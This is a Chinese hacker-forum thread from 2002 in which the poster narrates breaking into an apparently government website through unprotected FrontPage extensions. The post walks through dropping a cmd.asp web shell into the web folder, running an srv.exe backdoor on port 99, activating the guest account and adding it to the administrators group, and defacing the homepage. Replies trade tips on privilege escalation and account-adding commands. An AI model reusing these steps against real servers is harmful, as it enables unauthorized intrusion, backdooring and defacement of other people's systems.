>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  [原创]Frontpage扩展无权限设置入侵取得adm...
发表文章 发表涂鸦
  回复数:16  点击数:837 将此页发给您的朋友        
作者 主题: [原创]Frontpage扩展无权限设置入侵取得admin ( 页: 1 2 ) 回复 | 收藏 | 打印 | 篇末
幻影帅哥哦
级别:精灵
威望:0
经验:2
货币:1411
体力:96
来源:211.140.137.*
总发帖数:349
注册日期:2002-01-27
查看 邮件 主页 QQ 消息 引用 复制 下载 

晚上从网上下来,喝了杯咖啡。。。。倒,惨了。忘了咖啡是提神用的,这下好了。。睡不下了,只好开启pc,连上肉鸡看看扫到了些什么了,
结果:一大堆的sql弱口令和大堆的U,,看看有什麽好玩的。。。。。。。。。“某某政府网站”,好,就这个。看看,原来是Frontpage无权限设置啊,我喜欢,,西西。。。连上肉鸡。。取出珍藏的cmd.asp,吹吹上面的灰尘,咳咳咳。。。
说说这个漏洞的来历吧,office中的acces类型的数据库上传到服务器上,运行的话,需要服务器上有Frontpage扩展支持。才可以运行,包括Frontpage的计数器等等一些功能都需要着扩展的支持。而其中一项就是可以远程管理网页目录的功能,这项功能在安装Frontpage扩展后也就是自动运行了,但似乎不会提醒管理员添加密码(知道的那位大虾后面帖一下),所以这个漏洞纯粹是配置不当造成的。
肉鸡上:打开‘网络邻居’-‘添加网上邻居’-输入ip(格式:http://ip)-next下去。
出来了,欢呼吧!!这就是对方的首页文件夹了,看到里面的文件了吗?(没看到?那不关我的事,这应该是属于眼科医生的任务)然后把cmd.asp拷贝到该web文件夹中。打开ie,输入http://ip/cmd.asp。ok,出现指令运行框了。那个run就是运行的意思(台下一大堆烂茄子飞了上来。。。。噼哩啪啦。。)
输入:dir c:\index.* /s 确定对方主页的目录
驱动器 C 中的卷没有标签。
卷的序列号是 702C-518C

c:\Program Files\Microsoft SQL Server\80\Tools\HTML 的目录

2000-04-28 00:33 96 index.gif
1 个文件 96 字节

c:\WINNT\amcdl\cache 的目录

2002-04-19 15:43 149 index.chc
1 个文件 149 字节

c:\WINNT\Cookies 的目录

2001-10-09 10:35 32,768 index.dat
1 个文件 32,768 字节

c:\WINNT\Help\iisHelp\iis\misc 的目录

1999-12-16 16:44 2,564 index.asp
1999-11-04 16:45 951 index.gif
1999-12-16 16:44 1,230 index.htm
3 个文件 4,745 字节

c:\WINNT\History\History.IE5 的目录

2001-10-09 10:35 49,152 index.dat
1 个文件 49,152 字节

c:\WINNT\Temporary Internet Files\Content.IE5 的目录

2001-10-09 10:43 180,224 index.dat
1 个文件 180,224 字节

列出所有文件:
8 个文件 267,134 字节
0 个目录 2,757,844,992 可用字节
看看,到他首页,看到它的首页文件名为index.swf看来不是这里。。看看其他的盘。。
dir d:\index.* /s
d:\nei 的目录

2002-04-28 09:33 6,189 index.htm
1 个文件 6,189 字节

d:\wai 的目录

2002-03-19 10:40 913 index.htm
1 个文件 913 字节

d:\wai\asp 的目录

2002-04-18 14:56 20,242 index.html
1 个文件 20,242 字节

d:\wai\asp\admin 的目录

2001-05-20 18:12 391 index.asp
1 个文件 391 字节

d:\xxssj 的目录

2002-04-22 14:37 2,490 index.asp
1 个文件 2,490 字节

d:\xxssj\swf 的目录

2002-04-22 14:37 32,102 index.swf
1 个文件 32,102 字节

d:\xxssj\swf\_vti_cnf 的目录

2002-04-16 15:27 221 index.swf
1 个文件 221 字节

d:\xxssj\_vti_cnf 的目录

2002-04-22 14:37 1,133 index.asp
1 个文件 1,133 字节

列出所有文件:
8 个文件 63,681 字节
0 个目录 10,368,991,232 可用字节
看到了吗?红色的就是首页目录和首页文件了,d:\xxssj和index.swf,ok!拷贝srv.exe,复制到刚才那个web文件夹中。然后在命令运行框中打入 d:\xxssj\srv.exe (这里要注意的是,当你打完命令后按下回车,ie进度条在动的时候就可以telnet ip 99了)
然后:net user guest /active:yes (解禁guest )
net user guest 1314 (设置guest的密码1314)
net localgroup administrators guest /add (将guest加入到admin组)
ok,现在已经取得了admin了。接下来该干什麽呢?换它的首页???还是…………delete给他点教训??不过我看了内部的配置后就打消了这个主意了。因为其内部的配置相当的完善,这漏洞纯粹是由于疏忽造成的。可以理解,人非圣贤嘛!
ok,就在他首页上写上几句话,提醒他一下好了。
“嘿嘿,不好意思。。我改了你首页,你的网站中存在着一些人为配置的错误。尽快修正吧……呵呵!!”
http://ziyoutongmeng.51.net
2002.4.23 午夜 幻影
其实本来还想在上面写上以前经常跟朋友改页时候用的一句话“我不黑你,谁黑你”。呵呵,不过后来想想,还是算了。瞌睡虫上来了,去睡觉了。明天还要半期考呢…………各位,good evening!!!
有什麽错误,欢迎指证。


[ 此消息由 幻影 在 2002-04-24.12:08:12 编辑过 ]
----------------------------------------------------------
有法故有破

躲在水底三天三夜,气也不喘,生吃鱼虾蟹,面不改色。。。嘻嘻
编辑 删除 发表时间发表于 2002-04-24.12:06:31  MSIE 6.0 Windows 2000IP: 已记录
玫瑰骑士帅哥哦
级别:精灵
威望:0
经验:2
货币:795
体力:80.7
来源:IP尚未分配
总发帖数:292
注册日期:2002-02-05
查看 邮件 主页 QQ 消息 引用 复制 下载 

COPY的很辛苦吧 谢谢咯~~
编辑 删除 发表时间发表于 2002-04-24.12:40:09  MSIE 5.01 Windows 2000IP: 已记录
X-Laser帅哥哦
级别:长 老 级
威望:0
经验:0
货币:37
体力:0.5
来源:218.0.252.*
总发帖数:628
注册日期:2002-02-10
查看 邮件 主页 QQ 消息 引用 复制 下载 

哈哈 对方要是ntfs的分区cmd.asp就不能运行那个run亦没用 呵呵 多连连吧~~ 这个偶早就试过了~~~
编辑 删除 发表时间发表于 2002-04-24.13:28:30  MSIE 5.0 Windows 98IP: 已记录
Meteor帅哥哦
级别:高级站友
威望:1
经验:0
货币:6
体力:0.2
来源:CyberSpace
总发帖数:138
注册日期:2001-12-14
查看 邮件 主页 QQ 消息 引用 复制 下载 

It may probably work on win 4.0,but never on win 2k since you can't gain the admin privilege with this sort of cgi vunearbility
编辑 删除 发表时间发表于 2002-04-24.14:23:49  MSIE 5.01 Windows 2000IP: 已记录
幻影帅哥哦
级别:精灵
威望:0
经验:2
货币:1411
体力:96
来源:61.154.156.*
总发帖数:349
注册日期:2002-01-27
查看 邮件 主页 QQ 消息 引用 复制 下载 

看了楼上的帖,我又去看了一下。那个应该是ntfs的,不知道你用的cmd.asp是哪个?我那个是可以连的。
----------------------------------------------------------
有法故有破

躲在水底三天三夜,气也不喘,生吃鱼虾蟹,面不改色。。。嘻嘻
编辑 删除 发表时间发表于 2002-04-24.14:52:47  MSIE 6.0 Windows 2000IP: 已记录
xhacker帅哥哦
级别:高级站友
威望:0
经验:0
货币:331
体力:12.6
来源:贵州
总发帖数:145
注册日期:2002-02-21
查看 邮件 主页 QQ 消息 引用 复制 下载 

我只想问,srv.exe怎么复制进入的?这个是最关键的。
其实admin的确可以拿到,而且是100%,只不过鲜有人想到罢了。
编辑 删除 发表时间发表于 2002-04-24.15:08:02  MSIE 5.01 Windows 2000IP: 已记录
三贤人帅哥哦
级别:老 站 友
威望:0
经验:2
货币:827
体力:94.4
来源:湖北
总发帖数:347
注册日期:2002-02-06
查看 邮件 主页 QQ 消息 引用 复制 下载 

很好!只不过我现在没有办法在家里上网。
----------------------------------------------------------
GOD IS IN HIS HEAVEN, ALL IS RIGHT WITH THE WORLD.
神不为者,人为之。
FamousDetective@SOHU.COM
编辑 删除 发表时间发表于 2002-04-24.15:59:42  MSIE 5.5 Windows MeIP: 已记录
bigworm帅哥哦
级别:中级站友
威望:0
经验:0
货币:
体力:
来源:福建
总发帖数:65
注册日期:2002-04-18
查看 邮件 主页 QQ 消息 引用 复制 下载 

如果添加用户成功,但是不能加到阿大米你admin组怎么办?
编辑 删除 发表时间发表于 2002-04-26.18:56:05  MSIE 5.01 Windows 2000IP: 已记录
sandflee帅哥哦
级别:长 老 级
威望:0
经验:0
货币:38
体力:1.3
来源:黑暗地狱
总发帖数:655
注册日期:2002-01-27
查看 邮件 主页 QQ 消息 引用 复制 下载 

这样运行的srv能建立admin组用户??不会吧?
----------------------------------------------------------
http://www.isgrey.com/
编辑 删除 发表时间发表于 2002-04-26.19:00:09  MSIE 6.0 Windows 2000IP: 已记录
BEYOND帅哥哦
级别:长 老 级
威望:0
经验:0
货币:137
体力:4.9
来源:218.25.130.*
总发帖数:633
注册日期:2002-02-07
查看 邮件 主页 QQ 消息 引用 复制 下载 

用这个方法我已经成功进入到对方的SYSTEM32下了但是现在我不能添加用户啊!反回来的信息是
C:\WINNT\system32>net user guest /active:yes
矫胶袍 坷幅 5捞(啊) 积板嚼聪促.

咀技胶啊 芭何登菌嚼聪促.

这是怎么回事啊!
----------------------------------------------------------
『刀』',◥◣↘╬小榕╬↙◢◤',『光』        『刀』',◥◣↘╬小榕╬↙◢◤',『光』
','〃,〃◢◤ 黑██客 ◥◣','〃,〃       ','〃,〃◢◤ 黑██客 ◥◣','〃,〃
','〃,〃◥◣红◥██◤客◢◤','〃,〃       ','〃,〃◥◣红◥██◤客◢◤','〃,〃
『雪』''◢◤↗蓝◥◤客↖◥◣''『影』        『雪』''◢◤↗蓝◥◤客↖◥◣''『影』
编辑 删除 发表时间发表于 2002-05-05.16:09:50  MSIE 5.01 Windows 2000IP: 已记录
幻影帅哥哦
级别:精灵
威望:0
经验:2
货币:1411
体力:96
来源:211.167.71.*
总发帖数:349
注册日期:2002-01-27
查看 邮件 主页 QQ 消息 引用 复制 下载 

补充:不知道为什么有的服务器用这个漏洞用后门工具,开后门后。连上去,虽然是在对方\winnt\system32\目录下,可是权限只是IIS_USER.
暂时解决办法:用权限提升工具 2ksystem
----------------------------------------------------------
有法故有破

躲在水底三天三夜,气也不喘,生吃鱼虾蟹,面不改色。。。嘻嘻
编辑 删除 发表时间发表于 2002-05-05.19:30:27  MSIE 6.0 Windows 2000IP: 已记录
BEYOND帅哥哦
级别:长 老 级
威望:0
经验:0
货币:137
体力:4.9
来源:218.24.128.*
总发帖数:633
注册日期:2002-02-07
查看 邮件 主页 QQ 消息 引用 复制 下载 

谢谢!
----------------------------------------------------------
『刀』',◥◣↘╬小榕╬↙◢◤',『光』        『刀』',◥◣↘╬小榕╬↙◢◤',『光』
','〃,〃◢◤ 黑██客 ◥◣','〃,〃       ','〃,〃◢◤ 黑██客 ◥◣','〃,〃
','〃,〃◥◣红◥██◤客◢◤','〃,〃       ','〃,〃◥◣红◥██◤客◢◤','〃,〃
『雪』''◢◤↗蓝◥◤客↖◥◣''『影』        『雪』''◢◤↗蓝◥◤客↖◥◣''『影』
编辑 删除 发表时间发表于 2002-05-05.21:44:04  MSIE 5.01 Windows 2000IP: 已记录
BEYOND帅哥哦
级别:长 老 级
威望:0
经验:0
货币:137
体力:4.9
来源:218.24.128.*
总发帖数:633
注册日期:2002-02-07
查看 邮件 主页 QQ 消息 引用 复制 下载 

我在SYSTEM32下绑定的命令错了吗?
ERunAsX net user beyond 1985719 /add
ERunAsX cmd.exe net user beyond 1985719 /add
这两个都不行啊
----------------------------------------------------------
『刀』',◥◣↘╬小榕╬↙◢◤',『光』        『刀』',◥◣↘╬小榕╬↙◢◤',『光』
','〃,〃◢◤ 黑██客 ◥◣','〃,〃       ','〃,〃◢◤ 黑██客 ◥◣','〃,〃
','〃,〃◥◣红◥██◤客◢◤','〃,〃       ','〃,〃◥◣红◥██◤客◢◤','〃,〃
『雪』''◢◤↗蓝◥◤客↖◥◣''『影』        『雪』''◢◤↗蓝◥◤客↖◥◣''『影』
编辑 删除 发表时间发表于 2002-05-05.22:08:34  MSIE 5.01 Windows 2000IP: 已记录
牛刀帅哥哦
级别:一般站友
威望:0
经验:0
货币:229
体力:35.3
来源:吉林
总发帖数:29
注册日期:2002-03-29
查看 邮件 主页 QQ 消息 引用 复制 下载 

2ksystem那里有啊?告诉我好吗?
----------------------------------------------------------
杀鸡何用宰牛刀
编辑 删除 发表时间发表于 2002-05-06.12:33:37  MSIE 6.0 Windows XPIP: 已记录
BEYOND帅哥哦
级别:长 老 级
威望:0
经验:0
货币:137
体力:4.9
来源:218.25.130.*
总发帖数:633
注册日期:2002-02-07
查看 邮件 主页 QQ 消息 引用 复制 下载 

黑白
----------------------------------------------------------
『刀』',◥◣↘╬小榕╬↙◢◤',『光』        『刀』',◥◣↘╬小榕╬↙◢◤',『光』
','〃,〃◢◤ 黑██客 ◥◣','〃,〃       ','〃,〃◢◤ 黑██客 ◥◣','〃,〃
','〃,〃◥◣红◥██◤客◢◤','〃,〃       ','〃,〃◥◣红◥██◤客◢◤','〃,〃
『雪』''◢◤↗蓝◥◤客↖◥◣''『影』        『雪』''◢◤↗蓝◥◤客↖◥◣''『影』
编辑 删除 发表时间发表于 2002-05-06.13:28:40  MSIE 5.01 Windows 2000IP: 已记录
snowstorm帅哥哦
级别:中级站友
威望:0
经验:0
货币:80
体力:3
来源:218.6.51.*
总发帖数:69
注册日期:2002-03-30
查看 邮件 主页 QQ 消息 引用 复制 下载 

呵呵
去你NND.
我教你的东西你拿来这里.
哈哈哈哈哈哈.
编辑 删除 发表时间发表于 2002-05-07.17:06:29  MSIE 5.5 Windows 2000IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符
[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP [第 1 2 页]
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题